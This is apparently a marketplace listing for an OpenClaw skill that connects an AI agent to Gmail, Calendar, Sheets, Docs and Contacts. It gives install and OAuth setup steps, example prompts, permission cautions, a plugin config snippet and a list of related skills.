google-workspace
Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.
Why use this skill?
Integrate Gmail, Calendar, Docs, and Sheets into OpenClaw. Automate your workflow, organize meetings, and handle documents using AI-driven commands.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/google-workspace-ozgdcWhat This Skill Does
The google-workspace skill provides a robust interface for OpenClaw to interact with the core Google ecosystem. By integrating Gmail, Calendar, Sheets, and Docs, this skill allows users to automate complex administrative workflows directly from their chat interface. It leverages the official Google API to handle authentication and secure data transmission, enabling the AI to read emails, schedule meetings, manipulate spreadsheets for data analysis, and draft documents.
Installation
To install this skill, run: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-ozgdc.
Before execution, ensure the openclaw-agent is active on your system as specified in the prerequisite documentation. Follow the setup steps to configure your Google Cloud Project: obtain your credentials.json from the Google Cloud Console, enable the necessary APIs (Gmail, Calendar, Sheets, Docs, and People), and ensure the google_auth.py helper script is present in your working directory to manage OAuth tokens.
Use Cases
This skill is designed for power users and professionals who want to reduce context switching. You can use it to summarize long email threads, organize your daily schedule by querying calendar events, export research findings into structured Sheets rows, or generate template-based drafts in Google Docs. It acts as a bridge between your unstructured communications and structured data storage.
Example Prompts
- "Check my inbox for any urgent emails from 'HR' received in the last 24 hours and summarize the key action items for me."
- "Look at my calendar for tomorrow and tell me if I have enough time for a one-hour focus block between my scheduled meetings."
- "Take this project status update and draft a new document in my Drive, then add the summary as a new row in my Project Tracking sheet."
Tips & Limitations
- Authentication: The first run requires a browser-based OAuth handshake. Ensure your machine has GUI access or valid remote display capabilities for this step.
- Permissions: The skill uses granular scopes; however, always be mindful that granting access to Gmail and Drive provides the AI with high-level access to your personal information.
- Limitations: Large-scale operations on Sheets may be subject to Google API rate limits. For heavy document processing, consider breaking tasks into smaller requests.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-google-workspace-ozgdc": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.